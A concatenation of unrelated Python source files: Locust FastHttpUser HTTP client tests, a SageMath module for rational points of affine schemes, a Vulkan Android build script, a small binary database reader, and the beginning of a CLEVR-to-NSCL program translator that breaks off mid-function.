r.failure("nope")
self.assertEqual(1, self.environment.stats.get("/ultra_fast", "GET").num_requests)
self.assertEqual(1, self.environment.stats.get("/ultra_fast", "GET").num_failures)
def test_catch_response_pass_failed_request(self):
s = self.get_client()
with s.get("/fail", catch_response=True) as r:
r.success()
self.assertEqual(1, self.environment.stats.total.num_requests)
self.assertEqual(0, self.environment.stats.total.num_failures)
def test_catch_response_multiple_failure_and_success(self):
s = self.get_client()
with s.get("/ultra_fast", catch_response=True) as r:
r.failure("nope")
r.success()
r.failure("nooo")
r.success()
self.assertEqual(1, self.environment.stats.total.num_requests)
self.assertEqual(0, self.environment.stats.total.num_failures)
def test_catch_response_pass_failed_request_with_other_exception_within_block(self):
class OtherException(Exception):
pass
s = self.get_client()
try:
with s.get("/fail", catch_response=True) as r:
r.success()
raise OtherException("wtf")
except OtherException as e:
pass
else:
self.fail("OtherException should have been raised")
self.assertEqual(1, self.environment.stats.total.num_requests)
self.assertEqual(0, self.environment.stats.total.num_failures)
def test_catch_response_default_success(self):
s = self.get_client()
with s.get("/ultra_fast", catch_response=True) as r:
pass
self.assertEqual(1, self.environment.stats.get("/ultra_fast", "GET").num_requests)
self.assertEqual(0, self.environment.stats.get("/ultra_fast", "GET").num_failures)
def test_catch_response_default_fail(self):
s = self.get_client()
with s.get("/fail", catch_response=True) as r:
pass
self.assertEqual(1, self.environment.stats.total.num_requests)
self.assertEqual(1, self.environment.stats.total.num_failures)
def test_error_message_with_name_replacement(self):
s = self.get_client()
kwargs = {}
def on_request(**kw):
self.assertIsNotNone(kw["exception"])
kwargs.update(kw)
self.environment.events.request.add_listener(on_request)
before_request = time.time()
s.request("get", "/wrong_url/01", name="replaced_url_name", context={"foo": "bar"})
after_request = time.time()
# self.assertIn("for url: replaced_url_name", str(kwargs["exception"])) # this is actually broken for FastHttpUser right now...
self.assertAlmostEqual(before_request, kwargs["start_time"], delta=0.01)
self.assertAlmostEqual(after_request, kwargs["start_time"] + kwargs["response_time"] / 1000, delta=0.01)
self.assertEqual("/wrong_url/01", kwargs["url"]) # url is unaffected by name
self.assertDictEqual({"foo": "bar"}, kwargs["context"])
class TestRequestStatsWithWebserver(WebserverTestCase):
def test_request_stats_content_length(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
locust.client.get("/ultra_fast")
self.assertEqual(
self.runner.stats.get("/ultra_fast", "GET").avg_content_length, len("This is an ultra fast response")
)
locust.client.get("/ultra_fast")
self.assertEqual(
self.runner.stats.get("/ultra_fast", "GET").avg_content_length, len("This is an ultra fast response")
)
def test_request_stats_no_content_length(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
l = MyUser(self.environment)
path = "/no_content_length"
r = l.client.get(path)
self.assertEqual(
self.runner.stats.get(path, "GET").avg_content_length,
len("This response does not have content-length in the header"),
)
def test_request_stats_no_content_length_streaming(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
l = MyUser(self.environment)
path = "/no_content_length"
r = l.client.get(path, stream=True)
self.assertEqual(0, self.runner.stats.get(path, "GET").avg_content_length)
def test_request_stats_named_endpoint(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
locust.client.get("/ultra_fast", name="my_custom_name")
self.assertEqual(1, self.runner.stats.get("my_custom_name", "GET").num_requests)
def test_request_stats_query_variables(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
locust.client.get("/ultra_fast?query=1")
self.assertEqual(1, self.runner.stats.get("/ultra_fast?query=1", "GET").num_requests)
def test_request_stats_put(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
locust.client.put("/put")
self.assertEqual(1, self.runner.stats.get("/put", "PUT").num_requests)
def test_request_connection_error(self):
class MyUser(FastHttpUser):
host = "http://localhost:1"
locust = MyUser(self.environment)
response = locust.client.get("/", timeout=0.1)
self.assertEqual(response.status_code, 0)
self.assertEqual(1, self.runner.stats.get("/", "GET").num_failures)
self.assertEqual(1, self.runner.stats.get("/", "GET").num_requests)
class TestFastHttpUserClass(WebserverTestCase):
def test_is_abstract(self):
self.assertTrue(FastHttpUser.abstract)
self.assertFalse(is_user_class(FastHttpUser))
def test_class_context(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
def context(self):
return {"user": self.username}
kwargs = {}
def on_request(**kw):
kwargs.update(kw)
self.environment.events.request.add_listener(on_request)
user = MyUser(self.environment)
user.username = "foo"
user.client.request("get", "/request_method")
self.assertDictEqual({"user": "foo"}, kwargs["context"])
self.assertEqual("GET", kwargs["response"].text)
user.client.request("get", "/request_method", context={"user": "bar"})
self.assertDictEqual({"user": "bar"}, kwargs["context"])
def test_get_request(self):
self.response = ""
def t1(l):
self.response = l.client.get("/ultra_fast")
class MyUser(FastHttpUser):
tasks = [t1]
host = "http://127.0.0.1:%i" % self.port
my_locust = MyUser(self.environment)
t1(my_locust)
self.assertEqual(self.response.text, "This is an ultra fast response")
def test_client_request_headers(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("hello", locust.client.get("/request_header_test", headers={"X-Header-Test": "hello"}).text)
def test_client_get(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("GET", locust.client.get("/request_method").text)
def test_client_get_absolute_url(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("GET", locust.client.get("http://127.0.0.1:%i/request_method" % self.port).text)
def test_client_post(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("POST", locust.client.post("/request_method", {"arg": "hello world"}).text)
self.assertEqual("hello world", locust.client.post("/post", {"arg": "hello world"}).text)
def test_client_put(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("PUT", locust.client.put("/request_method", {"arg": "hello world"}).text)
self.assertEqual("hello world", locust.client.put("/put", {"arg": "hello world"}).text)
def test_client_delete(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("DELETE", locust.client.delete("/request_method").text)
self.assertEqual(200, locust.client.delete("/request_method").status_code)
def test_client_head(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual(200, locust.client.head("/request_method").status_code)
def test_log_request_name_argument(self):
self.response = ""
class MyUser(FastHttpUser):
tasks = []
host = "http://127.0.0.1:%i" % self.port
@task()
def t1(l):
self.response = l.client.get("/ultra_fast", name="new name!")
my_locust = MyUser(self.environment)
my_locust.t1()
self.assertEqual(1, self.runner.stats.get("new name!", "GET").num_requests)
self.assertEqual(0, self.runner.stats.get("/ultra_fast", "GET").num_requests)
def test_redirect_url_original_path_as_name(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
l = MyUser(self.environment)
l.client.get("/redirect")
self.assertEqual(1, len(self.runner.stats.entries))
self.assertEqual(1, self.runner.stats.get("/redirect", "GET").num_requests)
self.assertEqual(0, self.runner.stats.get("/ultra_fast", "GET").num_requests)
def test_network_timeout_setting(self):
class MyUser(FastHttpUser):
network_timeout = 0.5
host = "http://127.0.0.1:%i" % self.port
l = MyUser(self.environment)
timeout = gevent.Timeout(
seconds=0.6,
exception=AssertionError(
"Request took longer than 0.6 even though FastHttpUser.network_timeout was set to 0.5"
),
)
timeout.start()
r = l.client.get("/redirect?url=/redirect&delay=5.0")
timeout.cancel()
self.assertTrue(isinstance(r.error.original, socket.timeout))
self.assertEqual(1, self.runner.stats.get("/redirect?url=/redirect&delay=5.0", "GET").num_failures)
def test_max_redirect_setting(self):
class MyUser(FastHttpUser):
max_redirects = 1 # max_redirects and max_retries are funny names, because they are actually max attempts
host = "http://127.0.0.1:%i" % self.port
l = MyUser(self.environment)
l.client.get("/redirect")
self.assertEqual(1, self.runner.stats.get("/redirect", "GET").num_failures)
def test_allow_redirects_override(self):
class MyLocust(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
l = MyLocust(self.environment)
resp = l.client.get("/redirect", allow_redirects=False)
self.assertEqual("http://127.0.0.1:%i/ultra_fast" % self.port, resp.headers["location"])
resp = l.client.get("/redirect") # ensure redirect still works
self.assertFalse("location" in resp.headers)
def test_slow_redirect(self):
s = FastHttpSession(self.environment, "http://127.0.0.1:%i" % self.port, user=None)
url = "/redirect?url=/redirect&delay=0.5"
r = s.get(url)
stats = self.runner.stats.get(url, method="GET")
self.assertEqual(1, stats.num_requests)
self.assertGreater(stats.avg_response_time, 500)
def test_client_basic_auth(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
class MyAuthorizedUser(FastHttpUser):
host = "http://locust:menace@127.0.0.1:%i" % self.port
class MyUnauthorizedUser(FastHttpUser):
host = "http://locust:wrong@127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
unauthorized = MyUnauthorizedUser(self.environment)
authorized = MyAuthorizedUser(self.environment)
response = authorized.client.get("/basic_auth")
self.assertEqual(200, response.status_code)
self.assertEqual("Authorized", response.text)
self.assertEqual(401, locust.client.get("/basic_auth").status_code)
self.assertEqual(401, unauthorized.client.get("/basic_auth").status_code)
class TestFastHttpCatchResponse(WebserverTestCase):
def setUp(self):
super().setUp()
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
self.locust = MyUser(self.environment)
self.num_failures = 0
self.num_success = 0
def on_request(exception, **kwargs):
if exception:
self.num_failures += 1
self.last_failure_exception = exception
else:
self.num_success += 1
self.environment.events.request.add_listener(on_request)
def test_catch_response(self):
self.assertEqual(500, self.locust.client.get("/fail").status_code)
self.assertEqual(1, self.num_failures)
self.assertEqual(0, self.num_success)
with self.locust.client.get("/ultra_fast", catch_response=True) as response:
pass
self.assertEqual(1, self.num_failures)
self.assertEqual(1, self.num_success)
self.assertIn("ultra fast", str(response.content))
with self.locust.client.get("/ultra_fast", catch_response=True) as response:
raise ResponseError("Not working")
self.assertEqual(2, self.num_failures)
self.assertEqual(1, self.num_success)
def test_catch_response_http_fail(self):
with self.locust.client.get("/fail", catch_response=True) as response:
pass
self.assertEqual(1, self.num_failures)
self.assertEqual(0, self.num_success)
def test_catch_response_http_manual_fail(self):
with self.locust.client.get("/ultra_fast", catch_response=True) as response:
response.failure("Haha!")
self.assertEqual(1, self.num_failures)
self.assertEqual(0, self.num_success)
self.assertTrue(
isinstance(self.last_failure_exception, CatchResponseError),
"Failure event handler should have been passed a CatchResponseError instance",
)
def test_catch_response_http_manual_success(self):
with self.locust.client.get("/fail", catch_response=True) as response:
response.success()
self.assertEqual(0, self.num_failures)
self.assertEqual(1, self.num_success)
def test_catch_response_allow_404(self):
with self.locust.client.get("/does/not/exist", catch_response=True) as response:
self.assertEqual(404, response.status_code)
if response.status_code == 404:
response.success()
self.assertEqual(0, self.num_failures)
self.assertEqual(1, self.num_success)
def test_interrupt_taskset_with_catch_response(self):
class MyTaskSet(TaskSet):
@task
def interrupted_task(self):
with self.client.get("/ultra_fast", catch_response=True) as r:
raise InterruptTaskSet()
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
tasks = [MyTaskSet]
l = MyUser(self.environment)
ts = MyTaskSet(l)
self.assertRaises(InterruptTaskSet, lambda: ts.interrupted_task())
self.assertEqual(0, self.num_failures)
self.assertEqual(0, self.num_success)
def test_catch_response_connection_error_success(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:1"
l = MyUser(self.environment)
with l.client.get("/", catch_response=True) as r:
self.assertEqual(r.status_code, 0)
self.assertEqual(None, r.content)
r.success()
self.assertEqual(1, self.num_success)
self.assertEqual(0, self.num_failures)
def test_catch_response_connection_error_fail(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:1"
l = MyUser(self.environment)
with l.client.get("/", catch_response=True) as r:
self.assertEqual(r.status_code, 0)
self.assertEqual(None, r.content)
r.failure("Manual fail")
self.assertEqual(0, self.num_success)
self.assertEqual(1, self.num_failures)
def test_deprecated_request_events(self):
status = {"success_amount": 0, "failure_amount": 0}
def on_success(**kw):
status["success_amount"] += 1
def on_failure(**kw):
status["failure_amount"] += 1
self.environment.events.request_success.add_listener(on_success)
self.environment.events.request_failure.add_listener(on_failure)
with self.locust.client.get("/ultra_fast", catch_response=True) as response:
pass
with self.locust.client.get("/wrong_url", catch_response=True) as response:
pass
self.assertEqual(1, status["success_amount"])
self.assertEqual(1, status["failure_amount"])
class TestFastHttpSsl(LocustTestCase):
def setUp(self):
super().setUp()
tls_cert, tls_key = create_tls_cert("127.0.0.1")
self.tls_cert_file = NamedTemporaryFile()
self.tls_key_file = NamedTemporaryFile()
with open(self.tls_cert_file.name, "w") as f:
f.write(tls_cert.decode())
with open(self.tls_key_file.name, "w") as f:
f.write(tls_key.decode())
self.web_ui = self.environment.create_web_ui(
"127.0.0.1",
0,
tls_cert=self.tls_cert_file.name,
tls_key=self.tls_key_file.name,
)
gevent.sleep(0.01)
self.web_port = self.web_ui.server.server_port
def tearDown(self):
super().tearDown()
self.web_ui.stop()
def test_ssl_request_insecure(self):
s = FastHttpSession(self.environment, "https://127.0.0.1:%i" % self.web_port, insecure=True, user=None)
r = s.get("/")
self.assertEqual(200, r.status_code)
self.assertIn("<title>Locust for None</title>", r.content.decode("utf-8"))
self.assertIn("<p>Script: <span>None</span></p>", r.text)
|
r"""
Set of homomorphisms between two affine schemes
For schemes `X` and `Y`, this module implements the set of morphisms
`Hom(X,Y)`. This is done by :class:`SchemeHomset_generic`.
As a special case, the Hom-sets can also represent the points of a
scheme. Recall that the `K`-rational points of a scheme `X` over `k`
can be identified with the set of morphisms `Spec(K) \to X`. In Sage
the rational points are implemented by such scheme morphisms. This is
done by :class:`SchemeHomset_points` and its subclasses.
.. note::
You should not create the Hom-sets manually. Instead, use the
:meth:`~sage.structure.parent.Hom` method that is inherited by all
schemes.
AUTHORS:
- William Stein (2006): initial version.
- Ben Hutz (2018): add numerical point support
"""
#*****************************************************************************
# Copyright (C) 2006 William Stein <wstein@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.misc.verbose import verbose
from sage.rings.all import ZZ, CC, RR
from sage.rings.rational_field import is_RationalField
from sage.categories.fields import Fields
from sage.categories.number_fields import NumberFields
from sage.rings.finite_rings.finite_field_constructor import is_FiniteField
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
import sage.schemes.generic.homset
from copy import copy
#*******************************************************************
# Affine varieties
#*******************************************************************
class SchemeHomset_points_spec(sage.schemes.generic.homset.SchemeHomset_generic):
"""
Set of rational points of an affine variety.
INPUT:
See :class:`SchemeHomset_generic`.
EXAMPLES::
sage: from sage.schemes.affine.affine_homset import SchemeHomset_points_spec
sage: SchemeHomset_points_spec(Spec(QQ), Spec(QQ))
Set of rational points of Spectrum of Rational Field
"""
def _element_constructor_(self, *args, **kwds):
"""
The element constructor.
EXAMPLES::
sage: X = Spec(QQ)
sage: ring_hom = QQ.hom((1,), QQ); ring_hom
Ring endomorphism of Rational Field
Defn: 1 |--> 1
sage: H = X.Hom(X)
sage: H(ring_hom)
Affine Scheme endomorphism of Spectrum of Rational Field
Defn: Ring endomorphism of Rational Field
Defn: 1 |--> 1
TESTS::
sage: H._element_constructor_(ring_hom)
Affine Scheme endomorphism of Spectrum of Rational Field
Defn: Ring endomorphism of Rational Field
Defn: 1 |--> 1
"""
return sage.schemes.generic.homset.SchemeHomset_generic._element_constructor_(self, *args, **kwds)
def _repr_(self):
"""
Return a string representation of a homset.
OUTPUT: A string.
EXAMPLES::
sage: from sage.schemes.affine.affine_homset import SchemeHomset_points_spec
sage: S = SchemeHomset_points_spec(Spec(QQ), Spec(QQ))
sage: S._repr_()
'Set of rational points of Spectrum of Rational Field'
"""
return 'Set of rational points of '+str(self.codomain())
#*******************************************************************
# Affine varieties
#*******************************************************************
class SchemeHomset_points_affine(sage.schemes.generic.homset.SchemeHomset_points):
"""
Set of rational points of an affine variety.
INPUT:
See :class:`SchemeHomset_generic`.
EXAMPLES::
sage: from sage.schemes.affine.affine_homset import SchemeHomset_points_affine
sage: SchemeHomset_points_affine(Spec(QQ), AffineSpace(ZZ,2))
Set of rational points of Affine Space of dimension 2 over Rational Field
"""
def points(self, **kwds):
r"""
Return some or all rational points of an affine scheme.
For zero-dimensional subschemes the points are determined through a Groebner
basis computation. For schemes or subschemes of dimension at least one the
points are determined through enumeration up to the specified bound.
Over a finite field, all points are returned. Over an infinite field, all points satisfying the bound
are returned. For a zero-dimensional subscheme, all points are returned regardless of whether the field
is infinite or not.
For number fields, this uses the
Doyle-Krumm algorithm 4 (algorithm 5 for imaginary quadratic) for
computing algebraic numbers up to a given height [DK2013]_.
The algorithm requires floating point arithmetic, so the user is
allowed to specify the precision for such calculations.
Additionally, due to floating point issues, points
slightly larger than the bound may be returned. This can be controlled
by lowering the tolerance.
INPUT:
kwds:
- ``bound`` - real number (optional, default: 0). The bound for the
height of the coordinates. Only used for subschemes with
dimension at least 1.
- ``zero_tolerance`` - positive real number (optional, default=10^(-10)).
For numerically inexact fields, points are on the subscheme if they
satisfy the equations to within tolerance.
- ``tolerance`` - a rational number in (0,1] used in the Doyle-Krumm
algorithm 4 for enumeration over number fields.
- ``precision`` - the precision to use for computing the elements of
bounded height of number fields.
OUTPUT:
- a list of rational points of an affine scheme
.. WARNING::
For numerically inexact fields such as ComplexField or RealField the
list of points returned is very likely to be incomplete. It may also
contain repeated points due to tolerance.
EXAMPLES: The bug reported at #11526 is fixed::
sage: A2 = AffineSpace(ZZ, 2)
sage: F = GF(3)
sage: A2(F).points()
[(0, 0), (0, 1), (0, 2), (1, 0), (1, 1), (1, 2), (2, 0), (2, 1), (2, 2)]
::
sage: A.<x,y> = ZZ[]
sage: I = A.ideal(x^2-y^2-1)
sage: V = AffineSpace(ZZ, 2)
sage: X = V.subscheme(I)
sage: M = X(ZZ)
sage: M.points(bound=1)
[(-1, 0), (1, 0)]
::
sage: u = QQ['u'].0
sage: K.<v> = NumberField(u^2 + 3)
sage: A.<x,y> = AffineSpace(K, 2)
sage: len(A(K).points(bound=2))
1849
::
sage: A.<x,y> = AffineSpace(QQ, 2)
sage: E = A.subscheme([x^2 + y^2 - 1, y^2 - x^3 + x^2 + x - 1])
sage: E(A.base_ring()).points()
[(-1, 0), (0, -1), (0, 1), (1, 0)]
::
sage: A.<x,y> = AffineSpace(CC, 2)
sage: E = A.subscheme([y^3 - x^3 - x^2, x*y])
sage: E(A.base_ring()).points()
verbose 0 (124: affine_homset.py, points) Warning: computations in the numerical fields are inexact; points may be computed partially or incorrectly.
[(-1.00000000000000, 0.000000000000000),
(0.000000000000000, 0.000000000000000)]
::
sage: A.<x1,x2> = AffineSpace(CDF, 2)
sage: E = A.subscheme([x1^2 + x2^2 + x1*x2, x1 + x2])
sage: E(A.base_ring()).points()
verbose 0 (124: affine_homset.py, points) Warning: computations in the numerical fields are inexact; points may be computed partially or incorrectly.
[(0.0, 0.0)]
"""
from sage.schemes.affine.affine_space import is_AffineSpace
X = self.codomain()
if not is_AffineSpace(X) and X.base_ring() in Fields():
if hasattr(X.base_ring(), 'precision'):
numerical = True
verbose("Warning: computations in the numerical fields are inexact;points may be computed partially or incorrectly.", level=0)
zero_tol = RR(kwds.pop('zero_tolerance', 10**(-10)))
if zero_tol <= 0:
raise ValueError("tolerance must be positive")
else:
numerical = False
# Then X must be a subscheme
dim_ideal = X.defining_ideal().dimension()
if dim_ideal < 0: # no points
return []
if dim_ideal == 0: # if X zero-dimensional
rat_points = []
AS = X.ambient_space()
N = AS.dimension_relative()
BR = X.base_ring()
#need a lexicographic ordering for elimination
R = PolynomialRing(BR, N, AS.gens(), order='lex')
I = R.ideal(X.defining_polynomials())
I0 = R.ideal(0)
#Determine the points through elimination
#This is much faster than using the I.variety() function on each affine chart.
G = I.groebner_basis()
if G != [1]:
P = {}
points = [P]
#work backwards from solving each equation for the possible
#values of the next coordinate
for i in range(len(G) - 1, -1, -1):
new_points = []
good = 0
for P in points:
#substitute in our dictionary entry that has the values
#of coordinates known so far. This results in a single
#variable polynomial (by elimination)
L = G[i].substitute(P)
if R(L).degree() > 0:
if numerical:
for pol in L.univariate_polynomial().roots(multiplicities=False):
r = L.variables()[0]
varindex = R.gens().index(r)
P.update({R.gen(varindex):pol})
new_points.append(copy(P))
good = 1
else:
L = L.factor()
#the linear factors give the possible rational values of
#this coordinate
for pol, pow in L:
if pol.degree() == 1 and len(pol.variables()) == 1:
good = 1
r = pol.variables()[0]
varindex = R.gens().index(r)
# add this coordinate's information to
# each dictionary entry
P.update({R.gen(varindex):-pol.constant_coefficient() /
pol.monomial_coefficient(r)})
new_points.append(copy(P))
else:
new_points.append(P)
good = 1
if good:
points = new_points
# The dictionary entries now have values for all coordinates;
# they are the rational solutions to the equations.
# Make them into affine points.
for i in range(len(points)):
if numerical:
if len(points[i]) == N:
S = AS([points[i][R.gen(j)] for j in range(N)])
if all(g(list(S)) < zero_tol for g in X.defining_polynomials()):
rat_points.append(S)
else:
if len(points[i]) == N and I.subs(points[i]) == I0:
S = X([points[i][R.gen(j)] for j in range(N)])
rat_points.append(S)
rat_points = sorted(rat_points)
return rat_points
R = self.value_ring()
B = kwds.pop('bound', 0)
tol = kwds.pop('tolerance', 1e-2)
prec = kwds.pop('precision', 53)
if is_RationalField(R) or R == ZZ:
if not B > 0:
raise TypeError("a positive bound B (= %s) must be specified"%B)
from sage.schemes.affine.affine_rational_point import enum_affine_rational_field
return enum_affine_rational_field(self,B)
if R in NumberFields():
if not B > 0:
raise TypeError("a positive bound B (= %s) must be specified"%B)
from sage.schemes.affine.affine_rational_point import enum_affine_number_field
return enum_affine_number_field(self, bound=B, tolerance=tol, precision=prec)
elif is_FiniteField(R):
from sage.schemes.affine.affine_rational_point import enum_affine_finite_field
return enum_affine_finite_field(self)
else:
raise TypeError("unable to enumerate points over %s"%R)
def numerical_points(self, F=None, **kwds):
"""
Return some or all numerical approximations of rational points of an affine scheme.
This is for zero-dimensional subschemes only. The points are determined
through a Groebner basis computation over the base ring, followed by
numerically approximating the roots of the resulting polynomials. If the
base ring is a number field, the embedding into ``F`` must be known.
INPUT:
``F`` - numerical ring
kwds:
- ``zero_tolerance`` - positive real number (optional, default=10^(-10)).
For numerically inexact fields, points are on the subscheme if they
satisfy the equations to within tolerance.
OUTPUT: A list of points in the ambient space.
.. WARNING::
For numerically inexact fields the list of points returned may contain
repeated points or be missing points due to tolerance.
EXAMPLES::
sage: K.<v> = QuadraticField(3)
sage: A.<x,y> = AffineSpace(K, 2)
sage: X = A.subscheme([x^3 - v^2*y, y - v*x^2 + 3])
sage: L = X(K).numerical_points(F=RR); L # abs tol 1e-14
[(-1.18738247880014, -0.558021142104134),
(1.57693558184861, 1.30713548084184),
(4.80659931965815, 37.0162574656220)]
sage: L[0].codomain()
Affine Space of dimension 2 over Real Field with 53 bits of precision
::
sage: A.<x,y> = AffineSpace(QQ, 2)
sage: X = A.subscheme([y^2 - x^2 - 3*x, x^2 - 10*y])
sage: len(X(QQ).numerical_points(F=ComplexField(100)))
4
::
sage: A.<x1, x2> = AffineSpace(QQ, 2)
sage: E = A.subscheme([30*x1^100 + 1000*x2^2 + 2000*x1*x2 + 1, x1 + x2])
sage: len(E(A.base_ring()).numerical_points(F=CDF, zero_tolerance=1e-9))
100
TESTS::
sage: A.<x,y> = AffineSpace(QQ, 2)
sage: X = A.subscheme([y^2 - x^2 - 3*x, x^2 - 10*y])
sage: X(QQ).numerical_points(F=QQ)
Traceback (most recent call last):
...
TypeError: F must be a numerical field
::
sage: A.<x,y> = AffineSpace(QQ, 2)
sage: X = A.subscheme([y^2 - x^2 - 3*x, x^2 - 10*y])
sage: X(QQ).numerical_points(F=CC, zero_tolerance=-1)
Traceback (most recent call last):
...
ValueError: tolerance must be positive
"""
from sage.schemes.affine.affine_space import is_AffineSpace
if F is None:
F = CC
if F not in Fields() or not hasattr(F, 'precision'):
raise TypeError('F must be a numerical field')
X = self.codomain()
if X.base_ring() not in NumberFields():
raise TypeError('base ring must be a number field')
AA = X.ambient_space().change_ring(F)
if not is_AffineSpace(X) and X.base_ring() in Fields():
# Then X must be a subscheme
dim_ideal = X.defining_ideal().dimension()
if dim_ideal != 0:  # only zero-dimensional subschemes are handled here
return []
else:
return []
# if X zero-dimensional
zero_tol = RR(kwds.pop('zero_tolerance', 10**(-10)))
if zero_tol <= 0:
raise ValueError("tolerance must be positive")
rat_points = []
PS = X.ambient_space()
N = PS.dimension_relative()
BR = X.base_ring()
# need a lexicographic ordering for elimination
R = PolynomialRing(BR, N, PS.gens(), order='lex')
RF = R.change_ring(F)
I = R.ideal(X.defining_polynomials())
# Determine the points through elimination. This is much faster
# than using the I.variety() function on each affine chart.
G = I.groebner_basis()
G = [RF(g) for g in G]
if G != [1]:
P = {}
points = [P]
# work backwards from solving each equation for the possible
# values of the next coordinate
for g in reversed(G):
new_points = []
good = False
for P in points:
# substitute in our dictionary entry that has the
# values of coordinates known so far. This results
# in a single variable polynomial (by elimination)
L = g.substitute(P)
if len(RF(L).variables()) == 1:
r = L.variables()[0]
var = RF.gen(RF.gens().index(r))
for pol in L.univariate_polynomial().roots(ring=F,
multiplicities=False):
P[var] = pol
new_points.append(copy(P))
good = True
else:
new_points.append(P)
good = True
if good:
points = new_points
# The dictionary entries now have values for all coordinates;
# they are the rational solutions to the equations.
# Make them into affine points.
polys = [g.change_ring(F) for g in X.defining_polynomials()]
for P in points:
if len(P) == N:
S = AA([P[R.gen(j)] for j in range(N)])
if all(g(list(S)) < zero_tol for g in polys):
rat_points.append(S)
rat_points = sorted(rat_points)
return rat_points
|
import os
import shutil
import subprocess
import sys
import glob
APK_NAME = "vulkanTexturearray"
SHADER_DIR = "texturearray"
ASSETS_TEXTURES = ["texturearray_bc3_unorm.ktx", "texturearray_astc_8x8_unorm.ktx", "texturearray_etc2_unorm.ktx"]
if subprocess.call("ndk-build", shell=True) == 0:
print("Build successful")
# Assets
if not os.path.exists("./assets"):
os.makedirs("./assets")
# Shaders
# Base
if not os.path.exists("./assets/shaders/base"):
os.makedirs("./assets/shaders/base")
for file in glob.glob("../../data/shaders/base/*.spv"):
shutil.copy(file, "./assets/shaders/base")
# Sample
if not os.path.exists("./assets/shaders/%s" % SHADER_DIR):
os.makedirs("./assets/shaders/%s" % SHADER_DIR)
for file in glob.glob("../../data/shaders/%s/*.spv" %SHADER_DIR):
shutil.copy(file, "./assets/shaders/%s" % SHADER_DIR)
# Textures
if not os.path.exists("./assets/textures"):
os.makedirs("./assets/textures")
for file in ASSETS_TEXTURES:
shutil.copy("../../data/textures/%s" % file, "./assets/textures")
# Icon
if not os.path.exists("./res/drawable"):
os.makedirs("./res/drawable")
shutil.copy("../../android/images/icon.png", "./res/drawable")
if subprocess.call("ant debug -Dout.final.file=%s.apk" % APK_NAME, shell=True) == 0:
if len(sys.argv) > 1:
if sys.argv[1] == "-deploy":
if subprocess.call("adb install -r %s.apk" % APK_NAME, shell=True) != 0:
print("Could not deploy to device!")
else:
print("Error during build process!")
else:
print("Error building project!")
|
def sign_executable(executable_filename):
print("Signing '{}'".format(executable_filename))
|
import struct
fr = open("albums.db", "rb")
fr.seek(0,2) # seek end
flen = fr.tell()
fr.seek(0) # seek set
l = struct.unpack("I", fr.read(4))
l = l[0]
print "Found %d records" % l
print "File size should be:"
print " count 512"
print " tracks %d" % (l * 512) #struct.calcsize(track_struct_format))
print " index %d" % (4 * (l - 1))
print " ----"
print " total %d" % (l * (512 + 4) - 4)
print " actual %d" % flen
x = []
idx = []
for i in range(l):
fr.seek(512 * i)
d = fr.read(64)
d = d.strip("\x00")
x.append(d)
fr.seek(512 * l)
for i in range(l-1):
d = struct.unpack("I", fr.read(4))
idx.append(d[0])
print(idx)
print(len(x))
for n, v in enumerate(idx):
    print(n, x[v])
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : program_translator.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 09/30/2018
#
# This file is part of NSCL-PyTorch.
# Distributed under terms of the MIT license.
"""
Tools for translating programs into different formats.
"""
from copy import deepcopy
__all__ = ['clevr_to_nsclseq']
def get_clevr_pblock_op(block):
"""
Return the operation of a CLEVR program block.
"""
if 'type' in block:
return block['type']
assert 'function' in block
return block['function']
def get_clevr_op_attribute(op):
return op.split('_')[1]
def clevr_to_nsclseq(clevr_program):
nscl_program = list()
mapping = dict()
for block_id, block in enumerate(clevr_program):
op = get_clevr_pblock_op(block)
current = None
if op == 'scene':
current = dict(op='scene')
elif op.startswith('filter'):
concept = block['value_inputs'][0]
last = nscl_program[mapping[block['inputs'][0]]]
if last['op'] == 'filter':
last['concept'].append(concept)
else:
current = dict(op='filter', concept=[concept])
elif op.startswith('relate'):
concept = block['value_inputs'][0]
current = dict(op='relate', relational_concept=[concept])
elif op.startswith('same'):
attribute = get_clevr_op_attribute(op)
current = dict(op='relate_attribute_equal', attribute=attribute)
elif op in ('intersect', 'union'):
current = dict(op=op)
elif op == 'unique':
pass # We will ignore the unique operations.
else:
if op.startswith('query'):
if block_id == len(clevr_program) - 1:
attribute = get_clevr_op_attribute(op)
current = dict(op='query', attribute=attribute)
elif op.startswith('equal') and op != 'equal_integer':
attribute = get_clevr_op_attribute(op)
current = dict(op='query_attribute_equal', attribute=attribute)
elif op == 'exist':
